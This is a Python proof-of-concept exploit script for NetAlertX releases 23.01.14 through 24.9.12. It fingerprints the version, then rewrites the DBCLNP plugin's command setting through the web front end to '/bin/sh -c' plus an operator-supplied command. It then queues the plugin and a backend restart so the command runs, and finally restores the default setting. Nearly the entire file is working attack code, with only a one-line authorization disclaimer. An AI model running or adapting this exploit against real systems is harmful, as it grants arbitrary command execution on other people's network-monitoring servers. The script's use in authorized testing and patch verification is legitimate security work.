"""Proof-of-concept for the NetAlertX settings-based command execution issue.

The script rewrites the DBCLNP plugin settings through the web front end and
then queues a run of that plugin. According to the version gate below, it
targets NetAlertX releases 23.01.14 through 24.9.12.

Use only against systems you own or are explicitly authorized to test.
"""
import argparse
import json
import re
import sys
import time
import uuid

import requests


class NetAlertXExploit:
    """Drive the settings-overwrite / queue-trigger sequence against one host."""

    # Seconds to wait for any single HTTP request before giving up.
    REQUEST_TIMEOUT = 10

    # Seconds to sleep between polls while waiting for settings to propagate.
    POLL_INTERVAL = 5

    # Inclusive bounds of the version range treated as vulnerable.
    MIN_VERSION = (23, 1, 14)
    MAX_VERSION = (24, 9, 12)

    # Command string written back to DBCLNP_CMD during cleanup.
    DEFAULT_DBCLNP_CMD = (
        'python3 /app/front/plugins/db_cleanup/script.py '
        'pluginskeephistory={pluginskeephistory} '
        'hourstokeepnewdevice={hourstokeepnewdevice} '
        'daystokeepevents={daystokeepevents} '
        'pholuskeepdays={pholuskeepdays}'
    )

    def __init__(self, target_url, cmd):
        """Store the target base URL and the command to submit.

        Args:
            target_url: Base URL of the instance; a trailing slash is removed.
            cmd: Command text, embedded after ``/bin/sh -c``.
        """
        self.target_url = target_url.rstrip('/')
        self.cmd = f"/bin/sh -c {cmd}"
        self.session = requests.Session()

    def check_version(self):
        """Checks if the target is running a vulnerable version of NetAlertX.

        Returns:
            True when ``/maintenance.php`` answers 200 and reports a version
            inside the inclusive range MIN_VERSION..MAX_VERSION. False on any
            request error, non-200 status, missing version string, or version
            outside the range.
        """
        try:
            res = self.session.get(
                f"{self.target_url}/maintenance.php",
                timeout=self.REQUEST_TIMEOUT,
            )
        except requests.RequestException:
            return False

        if res.status_code != 200:
            return False

        # Regex to find version in the HTML
        version_match = re.search(
            r'Installed version.*?v?(\d+\.\d+\.\d+)', res.text, re.S
        )
        if not version_match:
            return False

        version = version_match.group(1)
        # Compare numerically, component by component, so "01" equals 1.
        v_parts = tuple(int(p) for p in version.split('.'))

        if self.MIN_VERSION <= v_parts <= self.MAX_VERSION:
            print(f"[*] Detected Version: {version} (Vulnerable)")
            return True

        print(f"[*] Detected Version: {version} (Not in vulnerable range)")
        return False

    def update_settings(self, cmd_val, schedule_val):
        """Post new DBCLNP run mode, command and schedule to the target.

        Args:
            cmd_val: Value written to ``DBCLNP_CMD``.
            schedule_val: Minute field of the cron expression written to
                ``DBCLNP_RUN_SCHD``; the remaining four fields are ``*``.

        Returns:
            True when the server answers with HTTP 200.

        Raises:
            requests.RequestException: On connection failure or timeout.
        """
        url = f"{self.target_url}/php/server/util.php"
        settings_payload = [
            ["DBCLNP", "DBCLNP_RUN", "string", "schedule"],
            ["DBCLNP", "DBCLNP_CMD", "string", cmd_val],
            ["DBCLNP", "DBCLNP_RUN_SCHD", "string", f"{schedule_val} * * * *"],
        ]
        data = {
            'function': 'savesettings',
            'settings': json.dumps(settings_payload),
        }
        res = self.session.post(url, data=data, timeout=self.REQUEST_TIMEOUT)
        return res.status_code == 200

    def check_settings_applied(self):
        """Report whether the published settings table shows ``self.cmd``.

        Returns:
            True when ``/api/table_settings.json`` contains a row whose
            ``Code_Name`` is ``DBCLNP_CMD`` and whose ``Value`` equals
            ``self.cmd``. False on request errors, non-200 status, invalid
            JSON, or an unexpected document shape.
        """
        url = f"{self.target_url}/api/table_settings.json"
        try:
            res = self.session.get(url, timeout=self.REQUEST_TIMEOUT)
            if res.status_code != 200:
                return False
            document = res.json()
        except (requests.RequestException, ValueError):
            # ValueError covers a body that is not valid JSON.
            return False

        rows = document.get('data', []) if isinstance(document, dict) else []
        if not isinstance(rows, list):
            return False

        return any(
            isinstance(row, dict)
            and row.get('Code_Name') == 'DBCLNP_CMD'
            and row.get('Value') == self.cmd
            for row in rows
        )

    def add_to_queue(self, task_cmd):
        """Submit one entry to the target's execution queue.

        Args:
            task_cmd: Queue action text; it is prefixed with a fresh UUID and
                a ``|`` separator before being sent.

        Returns:
            True when the server answers with HTTP 200.

        Raises:
            requests.RequestException: On connection failure or timeout.
        """
        url = f"{self.target_url}/php/server/util.php"
        data = {
            'function': 'addToExecutionQueue',
            'action': f"{uuid.uuid4()}|{task_cmd}",
        }
        res = self.session.post(url, data=data, timeout=self.REQUEST_TIMEOUT)
        return res.status_code == 200

    def _wait_for_settings(self, wait_time):
        """Poll check_settings_applied until it succeeds or time runs out."""
        start_time = time.time()
        while time.time() - start_time < wait_time:
            if self.check_settings_applied():
                return True
            time.sleep(self.POLL_INTERVAL)
        return False

    def run(self, wait_time=75, cleanup=True):
        """Run the full sequence: version gate, settings write, trigger.

        Args:
            wait_time: Maximum seconds to wait for the written settings to
                show up in the published settings table.
            cleanup: When True, write DEFAULT_DBCLNP_CMD and a ``*/30``
                schedule back once the settings have been modified, whether
                or not verification succeeded.
        """
        print(f"[*] Testing: {self.target_url}")

        # New Strict Version Check
        if not self.check_version():
            print("[-] Sorry, target not vulnerable. Stopping.")
            # Return instead of exiting so an importing caller keeps control.
            return

        if not self.update_settings(self.cmd, '*'):
            print("[-] Failed to update settings.")
            return

        try:
            print("[*] Waiting for settings to sync...")
            if self._wait_for_settings(wait_time):
                print("[+] Settings verified.")
                print("[*] Triggering execution...")
                self.add_to_queue('run|DBCLNP')
                self.add_to_queue('cron_restart_backend')
                print("[+] Exploit sent.")
            else:
                print("[-] Failed to verify settings in time.")
        finally:
            # The settings were already overwritten above, so restore them on
            # every exit path rather than leaving the target modified.
            if cleanup:
                print("[*] Cleaning up...")
                self.update_settings(self.DEFAULT_DBCLNP_CMD, '*/30')


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", required=True)
    parser.add_argument("-c", "--command", required=True)
    args = parser.parse_args()

    exploit = NetAlertXExploit(args.url, args.command)
    exploit.run()